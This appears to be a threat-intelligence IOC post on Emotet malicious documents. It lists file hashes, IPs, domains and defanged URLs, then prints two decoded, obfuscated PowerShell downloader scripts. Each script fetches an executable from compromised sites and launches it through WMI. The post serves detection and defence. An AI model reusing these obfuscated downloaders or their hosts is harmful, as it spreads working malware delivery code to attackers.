- #Emotet #Docs #malware #OSINT #IOC
- SHA256:
- 44b8c2c694e595c5c101cd70e1c07cb585b19db23cfd60049e3fe445f6df525d
- 6e9b1ad824b0bc35792a2ec92fabb0456af70c654e99e5f6d0067903f3c771ce
- 52b725e19110d9c7b614784f84880a6f9e181c033ba521b012662ada81fc1cb7
- 239b0c4f5e150bac96fff321ed672e0772718018ae715db9d4feb0b59879fbb7
- bdc6eceba4b95bac120bfeb41f35e7df45c0f48d1188331f7085b65431d29398
- b06fa4a03274712b0d1bea0d2a5d1afc2c71541acb80b1054d31b661b67514ea
- 16e038d9e33c53b2a57906401ffe6a6980d0b45d153610dc7b2b7e4257a3c6e7
- b16f77072d09279154089c427fc5151bc941751fde11d2e043d11f89f579d009
- 96c9ac5b39fd07ad898f381241ff17d003a4a90f6f87ab45d8dd74634ca67b13
- f72ce180f7fc38f18740d42dd0b6684e21e94348fe952221eb9a8f3c01400eb6
- f4a1c1efb7093c25364d501dddf8dac96dccf05f85d85d2947f5a5d2a687280d
- 120d8c2be86854307eaeb869f66dd85a90512e616a6390ebaf05c781ee48a6b3
- 59ab542232a464397ef49e4cf9c531e4570fece1fd69a64bf56b7abc56e3d859
- 8cc695377181d100d98ff6883804563f0a475e76454a98fe4c083005337e54ec
- 38de02c634244bac2df0a0e467d1eaee89645b9f33c1927e04ccf08761264d47
- 7f3f157b6efccbe88e544e49aa6b5571503e8f8e2d187cb88f30a38860b1537b
- IPs:
- 101.50.1.19
- 104.238.124.62
- 104.42.146.120
- 132.148.143.123
- 13.234.36.77
- 192.34.63.244
- 44.230.149.196
- 47.241.2.252
- 88.99.211.112
- 99.198.101.186
- Domains:
- af.rologyx.com
- beeptool.com
- besanads.com
- blog.newforceltd.com
- c8xtt.com
- dpsoma.com
- samontime.com
- scoopmagazines.com
- sindobatam.com
- techycivil.com
- URLs (defanged, hxxp = http):
- hxxps://samontime.com/wp-content/M7cidlobkp899135/
- hxxp://techycivil.com/wp-content/wvr/
- hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
- hxxp://besanads.com/wp-admin/PbgJVpz/
- hxxp://sindobatam.com/cgi-bin/5yq6g129/
- hxxp://blog.newforceltd.com/wp-content/uploads/qf/
- hxxps://c8xtt.com/wb/jDDwc504077/
- hxxps://af.rologyx.com/sites/i4vBd0msh/
- hxxps://beeptool.com/wp-admin/zyZ67961/
- hxxps://dpsoma.com/crm/vUQz884/
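- Decoded Base64 PowerShell (two downloader scripts listed back to back; the second begins at $NCVHLgby, on the same line where the first ends. URLs are defanged and shown one per line; in each script they form a single string that is split on [char]42, i.e. '*'):
- Behaviour relevant for detection: each script fetches the payload with Net.WebClient DownloadFile, saves it as %USERPROFILE%\413.exe (first script) or %USERPROFILE%\119.exe (second script), and starts it through WMI win32_Process Create only if the file is at least 23021 / 24008 bytes. The other short string assignments are never referenced again in the listing and appear to be filler.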
- $NMROOzgm='KLNDVdmf';
- [Net.ServicePointManager]::"S`ec`URITYpr`OtOcoL" = 'tls12, tls11, tls';
- $BVFWBptf = '413';
- $EPVRZkhp='HPXXCocy';
- $DUNQDywm=$env:userprofile+'\'+$BVFWBptf+'.exe';
- $OGNJRema='XZBKWeta';
- $CURKOwif=&('ne'+'w-obje'+'ct') NET.WebClIent;
- $USUNLijk='hxxps://samontime.com/wp-content/M7cidlobkp899135/
- hxxp://techycivil.com/wp-content/wvr/
- hxxp://scoopmagazines.com/wp-content/uploads/2020/sEsCvKF/
- hxxp://besanads.com/wp-admin/PbgJVpz/
- hxxp://sindobatam.com/cgi-bin/5yq6g129/'."sp`lIt"([char]42);
- $RUSDGkte='NNLPTetq';
- foreach($ERMRHnpl in $USUNLijk){try{$CURKOwif."doWnLoa`DfI`LE"($ERMRHnpl, $DUNQDywm);
- $MUYRFyaj='KXTSEbek';
- If ((&('Get-It'+'e'+'m') $DUNQDywm)."leng`Th" -ge 23021) {([wmiclass]'win32_Process')."cr`e`ATe"($DUNQDywm);
- $LADQMaym='IGWRFahg';
- break;
- $APTDWujg='UJKLIasf'}}catch{}}$JELRGlcb='NGNRWvsk'$NCVHLgby='CATPTxiv';
- [Net.ServicePointManager]::"s`EcUr`it`yPROto`cOl" = 'tls12, tls11, tls';
- $UWFTVhcw = '119';
- $SPMIUcfh='ASUNKxfy';
- $NQEKRoch=$env:userprofile+'\'+$UWFTVhcw+'.exe';
- $FFYJTczg='FDHKZevd';
- $QALMYzjt=.('n'+'ew-obj'+'ect') neT.WeBClIEnt;
- $DGBLBnzd='hxxp://blog.newforceltd.com/wp-content/uploads/qf/
- hxxps://c8xtt.com/wb/jDDwc504077/
- hxxps://af.rologyx.com/sites/i4vBd0msh/
- hxxps://beeptool.com/wp-admin/zyZ67961/
- hxxps://dpsoma.com/crm/vUQz884/'."SP`LIT"([char]42);
- $BTBFFziy='INJRNzop';
- foreach($TOCQGwsa in $DGBLBnzd){try{$QALMYzjt."d`owNloA`df`ilE"($TOCQGwsa, $NQEKRoch);
- $IJWJIola='KPTQRhne';
- If ((.('Get-'+'Item') $NQEKRoch)."LENg`Th" -ge 24008) {([wmiclass]'win32_Process')."CrE`A`TE"($NQEKRoch);
- $AZZBUirs='NPIWJhnu';
- break;
- $RKNTFvxj='RVBDJuvp'}}catch{}}$JHBBRvdm='CTJIEman'